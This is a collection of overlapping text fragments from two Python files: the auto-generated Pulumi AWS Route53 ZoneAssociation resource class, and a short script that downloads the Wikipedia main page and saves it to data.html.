"__name__ if __opts__ is not None: warnings.warn(\"explicit use of __opts__ is deprecated, use",
"DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing resource name argument (for",
"the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by",
"region. Defaults to the region of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\"",
"import pulumi import pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str]",
"[`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this standalone Zone VPC Association",
"this resource. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts:",
"region of the AWS provider. :param pulumi.Input[str] zone_id: The private hosted zone to",
"required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def",
"is not recommended. Use the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html)",
"private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region",
"are doing! *** import json import warnings import pulumi import pulumi.runtime from ..",
"hand unless you're certain you know what you are doing! *** import json",
"by hand unless you're certain you know what you are doing! *** import",
"dict() if vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id",
"use 'opts' instead\", DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing resource",
"class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with the private hosted",
"Hosted Zone VPC association. VPC associations can only be made on private zones.",
"= dict() if vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] =",
"VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At",
"it will cause a perpetual difference in plan output. You can optionally use",
"vpc_id __props__['vpc_region'] = vpc_region if zone_id is None: raise TypeError(\"Missing required property 'zone_id'\")",
"__opts__ if not resource_name: raise TypeError('Missing resource name argument (for URN creation)') if",
"Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're",
"region of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone",
"the `aws_route53_zone` resource to manage additional associations via this resource. :param str resource_name:",
"resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage additional",
"the same zone ID otherwise it will cause a perpetual difference in plan",
"The VPC to associate with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\"",
"provides both this standalone Zone VPC Association resource and exclusive VPC associations defined",
"Defaults to the region of the AWS provider. :param pulumi.Input[str] zone_id: The private",
"`ignore_changes` in the `aws_route53_zone` resource to manage additional associations via this resource. :param",
"VPC Association resource and exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html)",
"pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC",
"available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this standalone",
"# *** Do not edit by hand unless you're certain you know what",
"coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge",
"The VPC's region. Defaults to the region of the AWS provider. :param pulumi.Input[str]",
"`vpc` configuration blocks. At this time, you cannot use those in-line VPC associations",
"*** Do not edit by hand unless you're certain you know what you",
"if vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region']",
"__props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id is None: raise TypeError(\"Missing required",
"associations in conjunction with this resource and the same zone ID otherwise it",
"\"\"\" The VPC's region. Defaults to the region of the AWS provider. \"\"\"",
"vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC association.",
"resource_name = __name__ if __opts__ is not None: warnings.warn(\"explicit use of __opts__ is",
"association ordering is required (e.g. a separate cross-account association authorization), usage of this",
"\"\"\" if __name__ is not None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning)",
"is deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__ if not resource_name: raise",
"<reponame>Charliekenney23/pulumi-aws # coding=utf-8 # *** WARNING: this file was generated by the Pulumi",
"resource name argument (for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource",
"opts = __opts__ if not resource_name: raise TypeError('Missing resource name argument (for URN",
":param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for",
"resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop):",
"Tool. *** # *** Do not edit by hand unless you're certain you",
"DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn(\"explicit use of __opts__",
"warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is",
"ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with the private hosted zone.",
"cross-account association authorization), usage of this resource is not recommended. Use the `vpc`",
"be a ResourceOptions instance') __props__ = dict() if vpc_id is None: raise TypeError(\"Missing",
"edit by hand unless you're certain you know what you are doing! ***",
"resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource.",
"zone ID otherwise it will cause a perpetual difference in plan output. You",
"None: warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts =",
"zone_id: pulumi.Output[str] \"\"\" The private hosted zone to associate. \"\"\" def __init__(__self__, resource_name,",
"resource to manage additional associations via this resource. :param str resource_name: The name",
"provider. :param pulumi.Input[str] zone_id: The private hosted zone to associate. \"\"\" if __name__",
"is not None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name = __name__",
"required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id is None:",
"block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage additional associations via this",
"in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you cannot",
"required (e.g. a separate cross-account association authorization), usage of this resource is not",
"VPC associations can only be made on private zones. > **NOTE:** Unless explicit",
"with this resource and the same zone ID otherwise it will cause a",
"VPC to associate with the private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's",
"raise TypeError('Expected resource name to be a string') if opts and not isinstance(opts,",
"instead. > **NOTE:** Terraform provides both this standalone Zone VPC Association resource and",
"Use the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:**",
"only be made on private zones. > **NOTE:** Unless explicit association ordering is",
"instance') __props__ = dict() if vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\")",
"`aws_route53_zone` resource to manage additional associations via this resource. :param str resource_name: The",
"name to be a string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected",
"Unless explicit association ordering is required (e.g. a separate cross-account association authorization), usage",
"to the region of the AWS provider. :param pulumi.Input[str] zone_id: The private hosted",
"opts: Options for the resource. :param pulumi.Input[str] vpc_id: The VPC to associate with",
"associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this",
"recommended. Use the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. >",
"defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time,",
"__opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC association. VPC associations can only",
"blocks. At this time, you cannot use those in-line VPC associations in conjunction",
"the private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the",
"in plan output. You can optionally use the generic Terraform resource [lifecycle configuration",
"via this resource. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions",
"Manages a Route53 Hosted Zone VPC association. VPC associations can only be made",
"private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to the",
"with the private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults to",
"not None: warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts",
"association. VPC associations can only be made on private zones. > **NOTE:** Unless",
"> **NOTE:** Unless explicit association ordering is required (e.g. a separate cross-account association",
"vpc_region: The VPC's region. Defaults to the region of the AWS provider. :param",
"associations can only be made on private zones. > **NOTE:** Unless explicit association",
"resource options to be a ResourceOptions instance') __props__ = dict() if vpc_id is",
"utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with the",
"not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') __props__",
"resource is not recommended. Use the `vpc` configuration blocks available within the [`aws_route53_zone`",
"pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region of the AWS provider.",
"use of __name__ is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is not",
"of the AWS provider. :param pulumi.Input[str] zone_id: The private hosted zone to associate.",
"if not isinstance(resource_name, str): raise TypeError('Expected resource name to be a string') if",
"a perpetual difference in plan output. You can optionally use the generic Terraform",
"\"\"\" The VPC to associate with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str]",
"*** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool.",
"provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone to associate. \"\"\" def",
"will cause a perpetual difference in plan output. You can optionally use the",
"Zone VPC association. VPC associations can only be made on private zones. >",
"a string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to",
"on private zones. > **NOTE:** Unless explicit association ordering is required (e.g. a",
":param pulumi.Input[str] vpc_id: The VPC to associate with the private hosted zone. :param",
"by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit",
"AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone to associate. \"\"\"",
"name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str]",
"if __opts__ is not None: warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts'",
"warnings import pulumi import pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id:",
"in the `aws_route53_zone` resource to manage additional associations via this resource. :param str",
"translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop",
"import warnings import pulumi import pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource):",
"TypeError('Expected resource name to be a string') if opts and not isinstance(opts, pulumi.ResourceOptions):",
"Terraform provides both this standalone Zone VPC Association resource and exclusive VPC associations",
"TypeError('Expected resource options to be a ResourceOptions instance') __props__ = dict() if vpc_id",
"doing! *** import json import warnings import pulumi import pulumi.runtime from .. import",
"of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] vpc_id:",
"Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand",
":param pulumi.Input[str] zone_id: The private hosted zone to associate. \"\"\" if __name__ is",
"'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id is None: raise TypeError(\"Missing",
"same zone ID otherwise it will cause a perpetual difference in plan output.",
"\"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to the region of the",
"(for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name to be",
"use those in-line VPC associations in conjunction with this resource and the same",
"ResourceOptions instance') __props__ = dict() if vpc_id is None: raise TypeError(\"Missing required property",
"those in-line VPC associations in conjunction with this resource and the same zone",
"in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you",
"if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a",
"deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing",
"via `vpc` configuration blocks. At this time, you cannot use those in-line VPC",
"# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform",
"VPC's region. Defaults to the region of the AWS provider. \"\"\" zone_id: pulumi.Output[str]",
"raise TypeError('Missing resource name argument (for URN creation)') if not isinstance(resource_name, str): raise",
"URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name to be a",
"the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this standalone Zone VPC",
"generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to",
"zone to associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit use of __name__",
"associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit use of __name__ is deprecated\",",
"associate with the private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults",
"str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the",
"is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn(\"explicit use",
"Route53 Hosted Zone VPC association. VPC associations can only be made on private",
"creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name to be a string')",
"the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] vpc_id: The",
"within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this standalone Zone",
"VPC to associate with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The",
"a separate cross-account association authorization), usage of this resource is not recommended. Use",
"the region of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted",
"zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or",
"opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop)",
".. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate",
"this time, you cannot use those in-line VPC associations in conjunction with this",
"raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__,",
"output. You can optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with",
"resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] vpc_id: The VPC",
"__props__ = dict() if vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id']",
"resource and the same zone ID otherwise it will cause a perpetual difference",
"exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks.",
"TypeError('Missing resource name argument (for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected",
"raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id",
"to associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit use of __name__ is",
"additional associations via this resource. :param str resource_name: The name of the resource.",
"Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage",
"association authorization), usage of this resource is not recommended. Use the `vpc` configuration",
"and the same zone ID otherwise it will cause a perpetual difference in",
"tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with the private",
":param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region of the AWS",
"hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region of",
"resource and exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc`",
"made on private zones. > **NOTE:** Unless explicit association ordering is required (e.g.",
"VPC associations in conjunction with this resource and the same zone ID otherwise",
"conjunction with this resource and the same zone ID otherwise it will cause",
"= zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop)",
"both this standalone Zone VPC Association resource and exclusive VPC associations defined in-line",
"resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this standalone Zone VPC Association resource",
"be a string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options",
"None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name,",
"zone_id: The private hosted zone to associate. \"\"\" if __name__ is not None:",
"associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages",
"otherwise it will cause a perpetual difference in plan output. You can optionally",
"__props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return",
"Do not edit by hand unless you're certain you know what you are",
"plan output. You can optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle)",
"TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id is",
"instead\", DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing resource name argument",
"generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not",
"WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***",
"VPC's region. Defaults to the region of the AWS provider. :param pulumi.Input[str] zone_id:",
"Defaults to the region of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The",
"import pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The",
"is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation',",
"The VPC to associate with the private hosted zone. :param pulumi.Input[str] vpc_region: The",
"for the resource. :param pulumi.Input[str] vpc_id: The VPC to associate with the private",
"The private hosted zone to associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit",
"the AWS provider. :param pulumi.Input[str] zone_id: The private hosted zone to associate. \"\"\"",
"warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__",
"if zone_id is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation,",
"with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults",
"the region of the AWS provider. :param pulumi.Input[str] zone_id: The private hosted zone",
"The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param",
"not None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name = __name__ if",
"zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region of the",
"associations via this resource. :param str resource_name: The name of the resource. :param",
"and exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration",
"is required (e.g. a separate cross-account association authorization), usage of this resource is",
"unless you're certain you know what you are doing! *** import json import",
"*** import json import warnings import pulumi import pulumi.runtime from .. import utilities,",
"blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this",
"ordering is required (e.g. a separate cross-account association authorization), usage of this resource",
"(e.g. a separate cross-account association authorization), usage of this resource is not recommended.",
"TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts)",
"private hosted zone to associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit use",
"private hosted zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None,",
"import json import warnings import pulumi import pulumi.runtime from .. import utilities, tables",
"configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage additional associations via",
"the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you cannot use",
"__name__ is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn(\"explicit",
"perpetual difference in plan output. You can optionally use the generic Terraform resource",
"pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] vpc_id: The VPC to associate",
"vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] =",
"private zones. > **NOTE:** Unless explicit association ordering is required (e.g. a separate",
"not recommended. Use the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead.",
"this standalone Zone VPC Association resource and exclusive VPC associations defined in-line in",
"hosted zone to associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit use of",
"hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to the region",
"__props__['vpc_region'] = vpc_region if zone_id is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id']",
"cause a perpetual difference in plan output. You can optionally use the generic",
"json import warnings import pulumi import pulumi.runtime from .. import utilities, tables class",
"this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** #",
"resource. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options",
"= __name__ if __opts__ is not None: warnings.warn(\"explicit use of __opts__ is deprecated,",
"VPC association. VPC associations can only be made on private zones. > **NOTE:**",
"Zone VPC Association resource and exclusive VPC associations defined in-line in the [`aws_route53_zone`",
"'opts' instead\", DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing resource name",
"configuration blocks. At this time, you cannot use those in-line VPC associations in",
"AWS provider. :param pulumi.Input[str] zone_id: The private hosted zone to associate. \"\"\" if",
"isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') __props__ =",
"resource name to be a string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise",
"None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if",
"the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone to associate.",
"to be a string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource",
"The private hosted zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None,",
"**NOTE:** Unless explicit association ordering is required (e.g. a separate cross-account association authorization),",
"super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop",
"is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region",
"def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53",
"__self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def",
"time, you cannot use those in-line VPC associations in conjunction with this resource",
"separate cross-account association authorization), usage of this resource is not recommended. Use the",
"use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__ if",
"of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__ if not",
"options to be a ResourceOptions instance') __props__ = dict() if vpc_id is None:",
"opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC",
"file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # ***",
"you know what you are doing! *** import json import warnings import pulumi",
"not resource_name: raise TypeError('Missing resource name argument (for URN creation)') if not isinstance(resource_name,",
"can optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in",
"\"\"\" Manages a Route53 Hosted Zone VPC association. VPC associations can only be",
"`vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides",
"if __name__ is not None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name",
"isinstance(resource_name, str): raise TypeError('Expected resource name to be a string') if opts and",
"was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do",
"the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform",
"with `ignore_changes` in the `aws_route53_zone` resource to manage additional associations via this resource.",
"zones. > **NOTE:** Unless explicit association ordering is required (e.g. a separate cross-account",
"'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self,",
"zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None):",
"to associate with the private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region.",
"The VPC's region. Defaults to the region of the AWS provider. \"\"\" zone_id:",
":param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] vpc_id: The VPC to",
"what you are doing! *** import json import warnings import pulumi import pulumi.runtime",
"__opts__ is not None: warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\","
] |
[
"<gh_stars>0 # downoad web page import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data",
"with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved with name (current directory): data.html\\n\")",
"Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved with name",
"print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved",
"= \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as",
"request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with",
"page import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) #",
"\"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as fl:",
"# Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved with",
"# downoad web page import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data =",
"urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html",
"data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\"))",
"downoad web page import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read()",
"= request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\")",
"import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save",
"request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File",
"file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved with name (current directory):",
"html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved with name (current",
"web page import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\"))",
"as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file",
"url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\")"
] |
[
